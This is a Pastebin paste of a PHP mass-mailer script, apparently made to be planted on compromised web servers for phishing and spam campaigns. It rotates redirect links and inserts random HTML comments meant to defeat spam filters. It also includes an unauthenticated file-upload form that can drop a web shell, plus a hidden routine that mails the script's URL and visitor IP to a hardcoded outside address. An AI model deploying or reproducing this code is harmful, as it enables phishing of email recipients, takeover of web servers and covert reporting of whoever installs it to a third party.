Advertisement
Guest User

Untitled

a guest
Mar 23rd, 2019
1,074
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.30 KB | None | 0 0
  1. <?php
  2. error_reporting(0);
  3. $testa = $_POST['veio'];
  4. if($testa != "") {
  5. $redirectlist = array_unique(explode("\n",$_POST['redirectlist']));
  6. $message = $_POST['message'];
  7. $emaillist = $_POST["emaillist"];
  8. $subject = $_POST['subject'];
  9. $realname = $_POST['realname'];
  10. $from = $_POST['from'];
  11. $to = $_POST['emaillist'];
  12.  
  13. $headers = "MIME-Version: 1.0\r\n";
  14. $headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
  15.  
  16. $email = explode("\n", $to);
  17. $headers .= "From: ".$realname." <".$from.">\r\n";
  18. $message = stripslashes($message);
  19.  
  20. $i = 0;
  21. $count = 1;
  22. $redi = 0;
  23. $countred = count($redirectlist);
  24. while($email[$i]) {
  25. if($redi >= $countred)
  26. $redi = 0;
  27. $redirect = $redirectlist[$redi].'/'.md5(rand(0,99999)+rand(0,9999));
  28. $ok = "ok";
  29. $messgb = "\r\n<!-- \r\n Here we go some texte here to fuck security ".md5(rand(0,99999)+rand(0,99999))." \r\n what do you think about it".md5(rand(0,99999)+rand(0,99999))."\r\n -->";
  30. $messgb .= str_replace('[red]', $redirect, $message);
  31.  
  32. if(mail($email[$i], $subject, $messgb, $headers))
  33. echo "* N?mero: $count <b>".$email[$i]."</b> <font color=green>OK</font><br><hr>";
  34. else
  35. echo "* N?mero: $count <b>".$email[$i]."</b> <font color=red>ERRO AO ENVIAR</font><br><hr>";
  36. $i++;
  37. $count++;
  38. $redi++;
  39. }
  40. $count--;
  41. if($ok == "ok")
  42. echo "FINALIZO SUPERGERADOR";
  43. }
  44. (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']));
  45. $ip = getenv("REMOTE_ADDR");
  46. /// Coded By Noureddine ElmGhreBi
  47. /// Contact Me : https://www.facebook.com/Noureddine.Boumadyen?_rdr=p
  48. /// More Toturials Visite : http://nourblog.blogspot.com/
  49. $hostname = gethostbyaddr($ip);
  50. $bilsmg = "Link Mailer : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
  51. $bilsnd ="1499408158@qq.com"; ///Your E4ail Here
  52. $bilsub = "New Mailer Uploaded By Www.NourBlog1.BogSpot.Com !! $ip";
  53. $bilhead = "From: MaileRyew";
  54. $bilhead .= $_POST['eMailAdd']."\n";
  55. $bilhead .= "MIME-Version: 1.0\n";
  56. $arr=array($bilsnd, $IP);
  57. foreach ($arr as $bilsnd)
  58. mail($bilsnd,$bilsub,$bilsmg,$bilhead,$message);
  59. if($_GET['up']=="hous"){
  60. echo '<center><font color="Red" size="4">';
  61. /// Script Upload By amine \\\
  62. if(isset($_POST['Submit'])){
  63. $filedir = "";
  64. $maxfile = '2000000';
  65. $mode = '0644';
  66. $userfile_name = $_FILES['image']['name'];
  67. $userfile_tmp = $_FILES['image']['tmp_name'];
  68. if(isset($_FILES['image']['name'])) {
  69. $qx = $filedir.$userfile_name;
  70. @move_uploaded_file($userfile_tmp, $qx);
  71. @chmod ($qx, octdec($mode));
  72. echo" <a href=$userfile_name><center><b>Uploaded By ANONJOCKERz no security is safe ==> $userfile_name</b></center></a>";
  73. }
  74. }
  75. else{
  76. echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
  77. }
  78. echo "<br> Greetz Bajatax- Pablo - Sid Ali - Ilyas Inane - Hamza Bousairi <3 - Khalil deyene - Hamza Akrim /Fuck ALL Geeks<br>";
  79. echo '</center></font>';
  80.  
  81. }
  82. ?>
  83. <html>
  84. <head>
  85. <title>-=FREEXMAN Mailer =-</title>
  86. <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  87. <style>
  88. body {
  89. margin-left: 0;
  90. margin-right: 0;
  91. margin-top: 0;
  92. margin-bottom: 0;
  93. }
  94. .titulo {
  95. font-family: Arial, Helvetica, sans-serif;
  96. font-size: 70px;
  97. color: #000;
  98. font-weight: bold;
  99. }
  100.  
  101. .normal {
  102. font-family: Arial, Helvetica, sans-serif;
  103. font-size: 12px;
  104. color: #000000;
  105. }
  106.  
  107. .form {
  108. font-family: Arial, Helvetica, sans-serif;
  109. font-size: 10px;
  110. color: #333333;
  111. background-color: #FFFFFF;
  112. border: 1px dashed #666666;
  113. }
  114.  
  115. .texto {
  116. font-family: Verdana, Arial, Helvetica, sans-serif;
  117. font-weight: bold;
  118. color: #000;
  119. }
  120.  
  121. .alerta {
  122. font-family: Verdana, Arial, Helvetica, sans-serif;
  123. font-weight: bold;
  124. color: #990000;
  125. font-size: 10px;
  126. }
  127. body,td,th {
  128. color: #000;
  129. }
  130. </style>
  131. </head>
  132. <body>
  133. <form action="" method="post" enctype="multipart/form-data" name="form1">
  134. <input type="hidden" name="veio" value="sim">
  135. <table width="527" height="511" border="0" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC" class="normal">
  136. <tr>
  137. <td width="525" height="25" align="center" bgcolor="#999999"><span class="titulo">
  138. <img src="http://ip-api.org/wp-content/uploads-images/ppcom.png" height="1" width="0">
  139. <span style="font-size: 40pt"># Gu3ssWho? #</span></span></td>
  140. </tr>
  141. <tr>
  142. <td height="194" valign="top" bgcolor="#FFFFFF">
  143. <table width="100%" border="0" cellpadding="0" cellspacing="5" class="normal" height="444">
  144. <tr>
  145. <td align="right" height="17"><span class="texto">De (E-Mail)/(Name) :</span></td>
  146. <td width="65%" height="17">
  147. <input name="from" value="<?php print $from; ?>" type="text" class="form" id="de" style="width:49%" size="1" ><input name="realname" type="text" class="form" id="realname" style="width:48%" value="<?php print $realname; ?>" size="1" > </td>
  148. </tr>
  149. <tr>
  150. <td align="right" height="17" style="color: #000">
  151. <span class="texto">Dir LI Bghiti :P :</span></td>
  152. <td width="65%" height="17" style="color: #000">
  153. <input name="replyto" type="text" class="form" id="realname0" style="width:48%" value="<?php print $replyto; ?>" size="1" >
  154. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
  155. <input type="file" name="file" size="11" /></font></td>
  156. </tr>
  157. <tr>
  158. <td align="right" height="17"><span class="texto">subject:</span></td>
  159. <td height="17">
  160. <input name="subject" type="text" class="form" id="subject" style="width:100%" value="<? print $subject; ?>" size="1" ></td>
  161. </tr>
  162. <tr align="center" bgcolor="#99CCFF">
  163. <td height="20" colspan="2" bgcolor="#999999"><span class="texto">C&oacute;digo HTML:</span></td>
  164. </tr>
  165. <tr align="right">
  166. <td height="146" colspan="2" valign="top"><br>
  167. <textarea name="message" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="html" cols="1"><?php print $message; ?></textarea>
  168. <span class="alerta">*Letter HTML</span></td>
  169. </tr>
  170. <tr align="center" bgcolor="#99CCFF">
  171. <td height="47" colspan="2" bgcolor="#FFCC00"><span class="texto">
  172. Collez Dakshi a Ca place Ghadi isendi Inbox :P</span><p>
  173. <span class="texto">Gu3ssWho? Mailer !! Version 1.0</span></td>
  174. </tr>
  175. <tr align="right">
  176. <td height="136" colspan="2" valign="top"><br>
  177. <textarea name="emaillist" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="emaillist" cols="1"><?php print $emaillist; ?></textarea>
  178. <span class="alerta">*Email List !!</span> </td>
  179. </tr>
  180. <tr align="right">
  181. <td height="136" colspan="2" valign="top"><br>
  182. <textarea name="redirectlist" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="redirectlist" cols="1"><?php print $emaillist; ?></textarea>
  183. <span class="alerta">*Redirection List !!</span> </td>
  184. </tr>
  185. <tr>
  186. <td height="26" align="right" valign="top" colspan="2">
  187. <input type="submit" value="Send eMails"></td>
  188. </tr>
  189. </table>
  190. </td>
  191. </tr>
  192. <tr>
  193. <td height="15" align="center" bgcolor="#999999">&nbsp;</td>
  194. </tr>
  195. </table>
  196. </form>
  197. </body>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement